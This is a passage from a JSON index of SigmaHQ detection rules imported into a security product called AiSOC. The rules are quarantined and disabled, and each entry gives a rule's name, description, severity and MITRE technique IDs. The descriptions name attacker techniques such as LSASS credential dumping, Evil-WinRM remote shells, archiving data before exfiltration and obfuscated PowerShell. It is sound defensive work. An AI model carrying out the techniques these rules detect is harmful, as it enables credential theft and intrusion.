"detections/sigma-imports/_quarantine/tamper-with-sophos-av-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_sophos_av_tamper.yml" } }, { "id": "sigmahq-sigma-9f50fe98-fe5c-4a2d-86c7-fad7f63ed622", "type": "detection", "name": "Potentially Suspicious ASP.NET Compilation Via AspNetCompiler", "description": "Detects execution of \"aspnet_compiler.exe\" with potentially suspicious paths for compilation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-asp-net-compilation-via-aspnetcompiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f50fe98-fe5c-4a2d-86c7-fad7f63ed622", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml" } }, { "id": "sigmahq-sigma-9f546b25-5f12-4c8d-8532-5893dcb1e4b8", "type": "detection", "name": "Potentially Suspicious Child Process Of DiskShadow.EXE", "description": "Detects potentially suspicious child processes of \"Diskshadow.exe\". 
This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-process-of-diskshadow-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f546b25-5f12-4c8d-8532-5893dcb1e4b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml" } }, { "id": "sigmahq-sigma-9f5c1d59-33be-4e60-bcab-85d2f566effd", "type": "detection", "name": "Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs", "description": "Detects suspicious process access to LSASS.exe from processes located in uncommon locations with dbgcore.dll or dbghelp.dll in the call trace.\nThese DLLs contain functions like MiniDumpWriteDump that can be abused for credential dumping purposes. 
While modern tools like Mimikatz have moved to using ntdll.dll,\ndbgcore.dll and dbghelp.dll are still used by basic credential dumping utilities and legacy tools for LSASS memory access and process suspension techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-access-to-lsass-with-dbgcore-dbghelp-dlls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f5c1d59-33be-4e60-bcab-85d2f566effd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load.yml" } }, { "id": "sigmahq-sigma-9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", "type": "detection", "name": "Suspicious Windows Strings In URI", "description": "Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-strings-in-uri.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f6a34b4-2688-4eb7-a7f5-e39fef573d0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_susp_windows_path_uri.yml" } }, { "id": "sigmahq-sigma-9f8573c9-22b4-40e3-89c1-72bc2b8d49ab", "type": "detection", "name": "Scheduled Task Creation Masquerading as System Processes", "description": "Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1036.004", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-creation-masquerading-as-system-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f8573c9-22b4-40e3-89c1-72bc2b8d49ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml" } }, { "id": "sigmahq-sigma-9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "type": "detection", "name": "HackTool - SharpLDAPmonitor Execution", "description": "Detects execution of the SharpLDAPmonitor. 
Which can monitor the creation, deletion and changes to LDAP objects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpldapmonitor-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml" } }, { "id": "sigmahq-sigma-9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "type": "detection", "name": "Uncommon FileSystem Load Attempt By Format.com", "description": "Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which \"format.com\" is used to load malicious DLL files or other programs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-filesystem-load-attempt-by-format-com.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_format_uncommon_filesystem_load.yml" } }, { "id": "sigmahq-sigma-9fbf5927-5261-4284-a71d-f681029ea574", "type": "detection", "name": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", "description": "Detects the use of 7-Zip to compress data into a password-protected archive. An adversary may compress or encrypt collected data with third-party utilities prior to exfiltration to evade content inspection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/compress-data-and-lock-with-password-for-exfiltration-with-7-zip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fbf5927-5261-4284-a71d-f681029ea574", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_7zip_password_compression.yml" } }, { "id": "sigmahq-sigma-9fc3072c-dc8f-4bf7-b231-18950000fadd", "type": "detection", "name": "Potential Recon Activity Using DriverQuery.EXE", "description": "Detects usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-recon-activity-using-driverquery-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_driverquery_recon.yml" } }, { "id": "sigmahq-sigma-9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "type": "detection", "name": "Usage Of Web Request Commands And Cmdlets", "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/usage-of-web-request-commands-and-cmdlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" } }, { "id": "sigmahq-sigma-9fe55ea2-4cd6-4491-8a54-dd6871651b51", "type": "detection", "name": "HackTool - Evil-WinRm Execution - PowerShell Module", "description": "Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/hacktool-evil-winrm-execution-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fe55ea2-4cd6-4491-8a54-dd6871651b51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_hktl_evil_winrm_execution.yml" } }, { "id": "sigmahq-sigma-9fff585c-c33e-4a86-b3cd-39312079a65f", "type": "detection", "name": "Taskmgr as LOCAL_SYSTEM", "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/taskmgr-as-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_taskmgr_localsystem.yml" } }, { "id": "sigmahq-sigma-a015e032-146d-4717-8944-7a1884122111", "type": "detection", "name": "Linux HackTool Execution", "description": "Detects known hacktool execution based on image name.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", 
"enabled": false, "path": "detections/sigma-imports/_quarantine/linux-hacktool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a015e032-146d-4717-8944-7a1884122111", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml" } }, { "id": "sigmahq-sigma-a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "type": "detection", "name": "Suspicious Execution From Outlook Temporary Folder", "description": "Detects a suspicious program execution in Outlook temp folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-from-outlook-temporary-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml" } }, { "id": "sigmahq-sigma-a01b8329-5953-4f73-ae2d-aa01e1f35f00", "type": "detection", "name": "AspNetCompiler Execution", "description": "Detects execution of \"aspnet_compiler.exe\" which can be abused to compile and execute C# code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aspnetcompiler-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml" } }, { "id": "sigmahq-sigma-a0413867-daf3-43dd-9245-734b3a787942", "type": "detection", "name": "Bitlocker Key Retrieval", "description": "Monitor and alert for Bitlocker key retrieval.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitlocker-key-retrieval.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0413867-daf3-43dd-9245-734b3a787942", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml" } }, { "id": "sigmahq-sigma-a0459f02-ac51-4c09-b511-b8c9203fc429", "type": "detection", "name": "Potential Process Execution Proxy Via CL_Invocation.ps1", "description": "Detects calls to \"SyncInvoke\" that is part of the \"CL_Invocation.ps1\" script to proxy execution using \"System.Diagnostics.Process\"", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-process-execution-proxy-via-cl-invocation-ps1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml" } }, { "id": "sigmahq-sigma-a05baa88-e922-4001-bc4d-8738135f27de", "type": "detection", "name": "Process Monitor Driver Creation By Non-Sysinternals Binary", "description": "Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-monitor-driver-creation-by-non-sysinternals-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a05baa88-e922-4001-bc4d-8738135f27de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml" } }, { "id": "sigmahq-sigma-a07f0359-4c90-4dc4-a681-8ffea40b4f47", "type": "detection", 
"name": "Service Binary in Suspicious Folder", "description": "Detect the creation of a service with a service binary located in a suspicious directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-binary-in-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" } }, { "id": "sigmahq-sigma-a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "type": "detection", "name": "LSASS Access Detected via Attack Surface Reduction", "description": "Detects Access to LSASS Process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-access-detected-via-attack-surface-reduction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_asr_lsass_access.yml" } }, { "id": 
"sigmahq-sigma-a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9", "type": "detection", "name": "Okta New Admin Console Behaviours", "description": "Detects when Okta identifies new activity in the Admin Console.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-new-admin-console-behaviours.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0b38b70-3cb5-484b-a4eb-c4d8e7bcc0a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_new_behaviours_admin_console.yml" } }, { "id": "sigmahq-sigma-a0cb7110-edf0-47a4-9177-541a4083128a", "type": "detection", "name": "Vulnerable Netlogon Secure Channel Connection Allowed", "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-netlogon-secure-channel-connection-allowed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0cb7110-edf0-47a4-9177-541a4083128a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml" } }, { "id": "sigmahq-sigma-a0d7e4d2-bede-4141-8896-bc6e237e977c", "type": "detection", "name": "Suspicious File Download From File Sharing Domain Via Wget.EXE", "description": "Detects potentially suspicious file downloads from file sharing domains using wget.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-file-sharing-domain-via-wget-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0d7e4d2-bede-4141-8896-bc6e237e977c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-a0edd39f-a0c6-4c17-8141-261f958e8d8f", "type": "detection", "name": "PowerShell Remote Session Creation", "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-remote-session-creation.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" } }, { "id": "sigmahq-sigma-a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "type": "detection", "name": "Uncommon File Created In Office Startup Folder", "description": "Detects the creation of a file with an uncommon extension in an Office application startup folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-file-created-in-office-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml" } }, { "id": "sigmahq-sigma-a136ac98-b2bc-4189-a14d-f0d0388e57a7", "type": "detection", "name": "AWS S3 Bucket Versioning Disable", "description": "Detects when S3 bucket versioning is disabled. 
Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-s3-bucket-versioning-disable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a136ac98-b2bc-4189-a14d-f0d0388e57a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml" } }, { "id": "sigmahq-sigma-a136cde0-61ad-4a61-9b82-8dc490e60dd2", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" } }, { "id": 
"sigmahq-sigma-a1473adb-5338-4a20-b4c3-126763e2d3d3", "type": "detection", "name": "Suspicious Advpack Call Via Rundll32.EXE", "description": "Detects execution of \"rundll32\" calling \"advpack.dll\" with potential obfuscated ordinal calls in order to leverage the \"RegisterOCX\" function", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-advpack-call-via-rundll32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a1473adb-5338-4a20-b4c3-126763e2d3d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml" } }, { "id": "sigmahq-sigma-a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "type": "detection", "name": "Macro Enabled In A Potentially Suspicious Document", "description": "Detects registry changes to Office trust records where the path is located in a potentially suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macro-enabled-in-a-potentially-suspicious-document.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml" } }, { "id": "sigmahq-sigma-a16980c2-0c56-4de0-9a79-17971979efdd", "type": "detection", "name": "Cmd.EXE Missing Space Characters Execution Anomaly", "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation or a fat finger problem (typo by the developer).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cmd-exe-missing-space-characters-execution-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "a16980c2-0c56-4de0-9a79-17971979efdd", "source_commit": 